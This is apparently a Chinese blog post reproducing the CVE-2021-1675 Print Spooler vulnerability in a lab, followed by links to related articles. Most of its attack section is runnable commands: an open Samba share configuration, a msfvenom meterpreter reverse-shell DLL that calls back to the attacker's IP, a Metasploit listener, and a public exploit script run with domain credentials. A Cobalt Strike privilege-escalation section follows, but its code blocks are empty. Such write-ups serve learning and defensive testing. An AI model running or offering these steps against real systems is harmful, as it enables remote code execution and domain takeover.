CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
漏洞编号:
CVE-2021-1675
- 漏洞描述:
Print spooler 是 windows 打印后台处理服务,在windows平台使用打印所需调用的服务。攻击者可绕过RpcADDPrinterDriver的身份验证,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。企业中域普通账户就可以利用此漏洞。
- 漏洞影响范围:
略
- 漏洞复现:
本次复现使用kali攻击机一台,一台window server2019,域内普通用户账号一个复现。
配置一个smb共享服务
|
[global] workgroup = WORKGROUP server string = Samba Server netbios name = MYSERVER log file = /var/log/samba/log.%m max log size = 50 security = user map to guest = Bad User [smb] comment = Template Directories browseable = yes writeable = yes path = /tmp/ //攻击机 /tmp目录作为共享目录 guest ok = yes |
启动smb服务
|
service smbd start |
使用msf生成后门,并监听
|
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.150.120 LPORT=4444 -f dll -o /tmp/rever.dll |
|
msfconsole |
|
use exploit/multi/handler |
|
set payload windows/x64/meterpreter/reverse_tcp |
|
set lhost 0.0.0.0 |
|
run |
安装impacket工具利用该漏洞
lmpacket官方介绍为用于处理网络协议的Python类的集合,该集合包含了渗透测试中常见的工具种类,包括远程命令执行、信息收集、票据传递、凭据获取、中间人攻击测试等。该套件里的工具使用也是linux主机跳向windows主机的方式之一。
|
git clone https://github.com/cube0x0/CVE-2021-1675 python3 CVE-2021-1675.py qf.com/zy:0925scm.@192.168.150.128 '\\192.168.150.120\smb\rever.dll' |
尝试提权
思路:首先我们知道impacket工具已经可以实现将文件上传到域内主机,那么我们可以尝试结合cobalt strike来进行提权等操作
创建监听
|
|
生成dll文件,将dll通过smb上传到域主机,使cobaltstrike上线
|
|
|
python3 CVE-2021-1675.py qf.com/zy:0925scm.@192.168.150.128 '\\192.168.150.120\smb\artifact.dll' |
上线成功后,尝试提权
|
|
通过日志和命令可以看到我们拿到最高权限了
|
|
|
|
漏洞总结:
这个复现各个步骤理解,smb服务搭建在其中起到一个跳板的作用,给msf生成的dll提供了上传途径,使impacket可以将smb共享的rever.dll文件上传到域主机中,从而可以实现远程代码执行。从而可以尝试提权,达到控制域内所有主机的目的。
本篇笔记主要参考了
【安全红队】CVE-2021-1675 漏洞复现
Cobalt Strike | 狼组安全团队公开知识库
PS:写的笔记仓促,提权部分细节没有写到,以上理解是我个人理解,并非一定正确仅供参考。欢迎钢筋评论区对线。
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权相关推荐
- 齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysq ...
- CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行漏洞
报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527( ...
- 漏洞复现-远程代码执行-CVE-2017-10271-Weblogic
影响版本 OracleWebLogic Server10.3.6.0.0 OracleWebLogic Server12.1.3.0.0 OracleWebLogic Server12.2.1.1.0 ...
- 【安全漏洞】CVE-2021-42287CVE-2021-42278 域内提权
前言 网络安全技术学习,承认⾃⼰的弱点不是丑事.只有对原理了然于⼼,才能突破更多的限制.拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板.知识⾯,决定看到的攻击⾯有多⼴:知识 ...
- linux 25端口漏洞,Linux通过栈溢出进行提权实战(dpwwn03)
最近在刷vulnhub靶场,偶然间做到了dpwwn系列的靶场,其中dpwwn03靶场提权用的是程序栈溢出的漏洞,相对常规方法还是比较少见的,所以拿出来单独在这里研究下.既然讲到了提权,顺带介绍下常规的 ...
- linux kernel 4.4.1 uaf提权漏洞,条件竞争在Kernel提权中的应用
Double-Fetch漏洞简介 随着多核CPU硬件的普及,并行程序被越来越广泛地使用,尤其是在操作系统.实时系统等领域.然而并行程序将会引入并发错误,例如多个线程都将访问一个共享的内存地址.如果其中 ...
- netlogon启动后停止_【漏洞通报】微软NetLogon提权漏洞
近日,奇安信CERT监测到国外安全厂商发布了NetLogon 权限提升漏洞(CVE-2020-1472)的详细技术分析文章和验证脚本.此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS漏洞评分10 ...
- Windows Print Spooler服务最新漏洞CVE-2021-34527详解
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675 ...
- CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现 一.漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HT ...
- 【CVE-2018-12613】phpmyadmin 4.8.1 远程文件包含漏洞复现
**环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: tar ...
最新文章
- 超过一半的受访者表示愿意升级到Windows 11
- Gh0st源码学习(一)前期准备工作
- shapefile导入oracle,shp2sdo.exe用法:shpfile导入OracleSpatial
- pr下雪下雨_图像增强:下雨,下雪。 如何修改照片以训练自动驾驶汽车
- spark 读取多个路径_spark
- html2canvas 像素,html2canvas 如何生成高清图片?
- 系统辨识理论及应用_液压系统故障智能诊断方法(2)
- Unity代码分享——一个快速显示所有Sprite为Image_icon的帮助类
- 微信公众号小程序怎么做?
- 【vue】浏览器播放提示音audio
- java架构中:亿级用户中心的设计与实践
- w7电脑蓝屏怎么解决_电脑突然蓝屏,教您电脑突然蓝屏怎么解决
- AD20笔记-元器件绘制
- vue基础模板代码块设置
- php 图片印章_PHP实现中文圆形印章特效
- 再也不用担心因为PowerBI 可视化看板加班了——手把手详细教学
- 一句Json搞定数组中多层字段的替换
- 华众6.5虚拟主机管理系统SQL注入漏…
- 20行代码爬取原神角色全图
- 机器学习真能产生智能决策吗?